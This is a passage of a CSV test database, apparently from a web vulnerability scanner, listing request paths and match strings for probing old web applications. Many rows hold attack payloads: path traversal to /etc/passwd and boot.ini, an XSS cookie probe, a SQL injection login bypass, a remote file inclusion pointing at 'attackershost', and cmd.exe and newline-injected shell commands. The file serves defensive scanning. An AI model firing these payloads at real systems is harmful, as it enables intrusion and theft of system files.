seen in web logs from an unknown scanner.","","" "002449","","1","/forum_arc.asp?n=/....../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002450","","1","/forum_arc.asp?n=/.../.../.../.../.../.../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002451","","1","/forum_arc.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002452","","1","/forum_arc.asp?n=/../../../../../../../../etc/passwd|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002453","","1","/forum_arc.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002454","","1","/forum_arc.asp?n=/etc/passwd%00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002455","","1","/forum_arc.asp?n=/etc/passwd|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002456","","1","/forum_arc.asp?n=268","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002457","","1","/forum_arc.asp?n=c:\boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'c:'.","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002458","","1","/forum_professionnel.asp?n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'.","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002459","","1","/forum_professionnel.asp?n=....//....//....//....//....//....//....//etc.passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002460","","1","/forum_professionnel.asp?n=../../../../../../../../../etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002461","","1","/forum_professionnel.asp?n=/....../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002462","","1","/forum_professionnel.asp?n=/.../.../.../.../.../.../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002463","","1","/forum_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002464","","1","/forum_professionnel.asp?n=/../../../../../../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002465","","1","/forum_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002466","","1","/forum_professionnel.asp?n=/etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002467","","1","/forum_professionnel.asp?n=/etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002468","","1","/forum_professionnel.asp?n=100","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002469","","1","/forum_professionnel.asp?n=c:\boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'c:'.","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002470","","1","/functions.inc.php+","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002471","CVE-2002-0596","3","/get_od_toc.pl?Profile=","GET","PROGRA~1","","","","","WebTrends get_od_toc.pl may be vulnerable to a path disclosure error if this file is reloaded multiple times.","","" "002472","","1","/globals.php3","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002473","","1","/globals.pl","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002474","https://seclists.org/fulldisclosure/2004/Jun/49","6","/Gozila.cgi","GET","200","","","","","Linksys BEF Series routers are vulnerable to multiple DoS attacks in Gozila.cgi.","","" "002475","CVE-2001-1054","c","/helperfunction.php?includedir=@RFIURL","GET","PHP Version","","","","","phpAdsNew or SIPS helperfunction.php maybe vulnerable to remote file inclusion.","","" "002476","","1","/homebet/homebet.dll?form=menu&option=menu-signin","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002477","CVE-2006-0308","c","/htmltonuke.php?filnavn=@RFIURL","GET","PHP Version","","","","","HTMLtoNuke filnavn variable allows remote file inclusion.","","" "002478","","1","/idealbb/error.asp?|-|0|404_Object_Not_Found","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002479","","1","/iisprotect/admin/SiteAdmin.ASP?|-|0|404_Object_Not_Found","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002480","","1","/imprimer.asp?no=%60/etc/passwd%60|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'.","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002481","","1","/imprimer.asp?no=....//....//....//....//....//....//....//etc.passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002482","","1","/imprimer.asp?no=../../../../../../../../../etc/passwd%00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002483","","1","/imprimer.asp?no=/....../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002484","","1","/imprimer.asp?no=/.../.../.../.../.../.../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002485","","1","/imprimer.asp?no=/../../../../../../../../../../../../../../../../../../../../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002486","","1","/imprimer.asp?no=/../../../../../../../../etc/passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002487","","1","/imprimer.asp?no=/.\"./.\"./.\"./.\"./.\"./boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002488","","1","/imprimer.asp?no=/etc/passwd%00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002489","","1","/imprimer.asp?no=/etc/passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002490","","1","/imprimer.asp?no=c:\boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'c:'.","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002491","","1","/include/customize.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002492","","1","/include/help.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002493","","1","/includes/footer.php3","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002494","","1","/includes/header.php3","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002500","","1","/index.php?topic=&lt;script&gt;alert(document.cookie)&lt;/script&gt;%20","GET","alert\\\(document\.cookie\\\)","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002501","","1","/infos/contact/index.asp","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002502","","1","/infos/faq/index.asp","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002503","","1","/infos/gen/index.asp","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002504","","1","/infos/services/index.asp","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002505","","1","/instaboard/index.cfm","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002506","","1","/intranet/browse.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002507","","1","/invitefriends.php3","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002508","","1","/ipchat.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002509","","1","/ixmail_netattach.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002510","","1","/jsptest.jsp+","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002511","","1","/kernel/class/delete.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002512","","1","/kernel/classes/ezrole.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002513","","1","/ldap.search.php3?ldap_serv=nonsense%20","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002514","","1","/livredor/index.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002515","","1","/login.php3?reason=chpass2%20","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002516","","1","/mail/include.html","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002517","","1","/mail/settings.html","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002518","","1","/mail/src/read_body.php","GET","Project\sTeam","","","","","SquirrelMail found","","" "002519","","1","/mailview.cgi?cmd=view&fldrname=inbox&select=1&html=../../../../../../etc/passwd","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002520","","1","/mambo/banners.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002521","","1","/manage/login.asp+","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002522","","1","/mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002523","","1","/members/ID.pm","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002524","","1","/members/ID.xbb","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002525","","1","/mod.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002526","","1","/modif/delete.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002527","","1","/modif/ident.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002528","","1","/modif_infos.asp?n=%60/etc/passwd%60","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002529","","1","/modif_infos.asp?n=....//....//....//....//....//....//....//etc.passwd","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002530","","1","/modif_infos.asp?n=../../../../../../../../../etc/passwd%00","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002531","","1","/modif_infos.asp?n=/....../boot.ini","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002532","","1","/modif_infos.asp?n=/.../.../.../.../.../.../boot.ini","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002533","","1","/modif_infos.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002534","","1","/modif_infos.asp?n=/../../../../../../../../../etc/passwd","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002535","","1","/modif_infos.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002536","","1","/modif_infos.asp?n=/etc/passwd","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002537","","1","/modif_infos.asp?n=/etc/passwd%00","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002538","","1","/modif_infos.asp?n=c:\boot.ini","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002539","","1","/modules/Downloads/voteinclude.php+","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002540","","1","/modules/Forums/attachment.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002541","","1","/modules/Search/index.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002542","","1","/modules/WebChat/in.php+","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002543","","1","/modules/WebChat/out.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002544","","1","/modules/WebChat/quit.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002545","","1","/modules/WebChat/users.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002546","","1","/modules/Your_Account/navbar.php+","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002547","","1","/moregroupware/modules/webmail2/inc/","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002548","","1","/msadc/Samples/SELECTOR/showcode.asp?|-|0|404_Object_Not_Found","GET","200","","","Access Denied","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002549","","1","/myguestBk/add1.asp?|-|0|404_Object_Not_Found","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002550","","1","/myguestBk/admin/delEnt.asp?id=NEWSNUMBER|-|0|404_Object_Not_Found","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002551","","1","/myguestBk/admin/index.asp?|-|0|404_Object_Not_Found","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002552","","1","/netget?sid=Safety&msg=2002&file=Safety","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002553","","1","/newtopic.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002554","","1","/nphp/nphpd.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002555","","1","/OpenTopic","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002556","","1","/options.inc.php+","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002557","","1","/oscommerce/default.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002558","","1","/parse_xml.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002559","","1","/php/gaestebuch/admin/index.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002560","","1","/php/php4ts.dll","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002561","","1","/pks/lookup","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002562","","1","/pm/lib.inc.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002563","","1","/poppassd.php3+","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002564","","1","/produccart/pdacmin/login.asp?|-|0|404_Object_Not_Found","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002565","https://packetstormsecurity.com/files/32406/xmas.txt.html","1","/productcart/database/EIPC.mdb","GET","200","","","","","Seen in carding forums.","","" "002566","","1","/productcart/pc/Custva.asp?|-|0|404_Object_Not_Found","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002567","","1","/ProductCart/pc/msg.asp?|-|0|404_Object_Not_Found","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002568","","1","/product_info.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002569","","1","/prometheus-all/index.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002571","","1","/protected/","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002572","","1","/protected/secret.html+","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002573","","1","/protectedpage.php?uid='%20OR%20''='&pwd='%20OR%20''='","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002574","","1","/protection.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002575","","1","/pt_config.inc","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002576","","1","/pvote/add.php?question=AmIgAy&o1=yes&o2=yeah&o3=well..yeah&o4=bad%20","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002577","","1","/pvote/del.php?pollorder=1%20","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002578","","1","/quikmail/nph-emumail.cgi?type=../%00","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002579","","1","/room/save_item.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002580","","1","/rubrique.asp?no=%60/etc/passwd%60|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'.","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002581","","1","/rubrique.asp?no=....//....//....//....//....//....//....//etc.passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002582","","1","/rubrique.asp?no=../../../../../../../../../etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002583","","1","/rubrique.asp?no=/....../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002584","","1","/rubrique.asp?no=/.../.../.../.../.../.../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002585","","1","/rubrique.asp?no=/../../../../../../../../../../../../../../../../../../../../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002586","","1","/rubrique.asp?no=/../../../../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002587","","1","/rubrique.asp?no=/../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002588","","1","/rubrique.asp?no=/.\"./.\"./.\"./.\"./.\"./boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002589","","1","/rubrique.asp?no=/etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002590","","1","/rubrique.asp?no=/etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002591","","1","/rubrique.asp?no=c:\boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'c:'.","GET","boot load","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002592","","1","/screen.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002593","","1","/scripts/tradecli.dll","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002594","","1","/scripts/tradecli.dll?template=nonexistfile?template=..\..\..\..\..\winnt\system32\cmd.exe?/c+dir","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002595","","1","/security/web_access.html","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002596","","1","/sendphoto.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002597","","1","/servers/link.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002598","","1","/setpasswd.cgi","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002599","","1","/shop/php_files/site.config.php+","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002600","","1","/shop/search.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002601","","1","/shop/show.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002602","","1","/shoutbox/expanded.php?conf=../../../../../../../etc/passwd%20","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002603","","1","/Site/biztalkhttpreceive.dll","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002604","","1","/site_searcher.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002605","","1","/spelling.php3+","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002606","","1","/squirrelmail/src/read_body.php","GET","Project\sTeam","","","","","SquirrelMail found","","" "002607","","1","/staticpages/index.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002608","","1","/status.php3","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002609","","1","/supporter/index.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002610","","1","/supporter/tupdate.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002611","","1","/sw000.asp?|-|0|404_Object_Not_Found","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002612","","1","/syslog.htm?%20","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002613","","1","/technote/print.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002614","","1","/texis/websearch/phine","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002615","","1","/tinymsg.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002616","","1","/tmp_view.php?file=/etc/passwd","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002617","","1","/topic/entete.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002618","","1","/topsitesdir/edit.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002619","","1","/ttforum/index.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002620","","1","/tutos/file/file_new.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002621","","1","/tutos/file/file_select.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002622","","1","@TYPO3typo3/dev/translations.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002623","","1","/uifc/MultFileUploadHandler.php+","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002624","","1","/url.jsp","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002625","","1","/useraction.php3","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002626","","1","/userreg.cgi?cmd=insert&lang=eng&tnum=3&fld1=test999%0acat</var/spool/mail/login>>/etc/passwd","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002627","","1","/utils/sprc.asp+","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002628","","1","/vars.inc+","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002629","","1","/VBZooM/add-subject.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002630","","1","/wbboard/profile.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002631","","1","/wbboard/reply.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002632","","1","/webcalendar/login.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002633","","1","/webcalendar/view_m.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002634","","1","/webmail/lib/emailreader_execute_on_each_page.inc.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002635","","1","/webmail/src/read_body.php","GET","Project\sTeam","","","","","SquirrelMail found","","" "002636","","1","/web_app/WEB-INF/webapp.properties","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002637","","1","/XMBforum/buddy.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002638","","1","/XMBforum/member.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002639","","1","/x_stat_admin.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002640","","1","/yabbse/Reminder.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002641","","1","/yabbse/Sources/Packages.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002642","","1","/zentrack/index.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002643","","1","/_head.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002644","","1","@CGIDIRSadduser.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002645","","1","@CGIDIRSamadmin.pl","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002646","","1","@CGIDIRSanyboard.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002647","","1","@CGIDIRSAT-generate.cgi","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002648","","1","@CGIDIRSauctiondeluxe/auction.pl","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002649","","1","@CGIDIRSawl/auctionweaver.pl","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002650","","1","@CGIDIRSbb-ack.sh","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002651","","1","@CGIDIRSbb-histlog.sh","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" "002652","","1","@CGIDIRSbb-rep.sh","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","","" 